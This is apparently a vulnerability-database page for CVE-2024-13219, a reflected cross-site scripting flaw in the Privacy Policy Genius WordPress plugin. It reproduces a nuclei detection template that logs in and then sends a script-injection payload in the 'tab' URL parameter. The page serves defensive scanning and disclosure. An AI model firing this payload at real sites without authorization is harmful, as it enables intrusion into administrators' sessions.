Lucene search
K

Privacy Policy Genius - Cross-Site Scripting

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Privacy Policy Genius WordPress plugin 2.0.4 has a reflected cross-site scripting flaw.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13219
31 Jan 202506:16
circl
CNNVD
WordPress plugin Privacy Policy Genius 安全漏洞
31 Jan 202500:00
cnnvd
CVE
CVE-2024-13219
31 Jan 202506:00
cve
Cvelist
CVE-2024-13219 Policy Genius <= 2.0.4 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51438
3 Oct 202520:07
euvd
NVD
CVE-2024-13219
31 Jan 202506:15
nvd
OSV
CVE-2024-13219
31 Jan 202506:15
osv
Patchstack
WordPress Policy Genius plugin <= 2.0.4 - Reflected XSS vulnerability
31 Jan 202508:36
patchstack
Positive Technologies
PT-2025-2073
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13219
23 May 202507:10
redhatcve
Rows per page
id: CVE-2024-13219

info:
  name: Privacy Policy Genius - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Privacy Policy Genius WordPress plugin v2.0.4 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where input sanitization and escaping are properly implemented.
  reference:
    - https://wpscan.com/vulnerability/3ad02238-dce1-48ce-986f-fef36b110b2d/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13219
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13219
    cwe-id: CWE-79
    epss-score: 0.00565
    epss-percentile: 0.42884
    cpe: cpe:2.3:a:waelhassan:privacy_policy_genius:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: waelhassan
    product: privacy_policy_genius
    publicwww-query: "/plugins/policy-genius/"
  tags: cve,cve2024,waelhassan,privacy-policy-genius,wordpress,wp,wp-plugin,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=privacy_guru&tab=audit"></script><script>alert(document.domain)</script><script>&refresh=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "></script><script>alert(document.domain)</script><script>", "privacy_policy")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100a27b448202ed75902d2a8bf1c3b15a4aaa661af7872427efc20b076e56312b2402210084d6dc5956972ac505aa60acc61445874fd6d59cb8e4fb4d87c33eeabdb21474:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 13:40Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00565
SSVC
8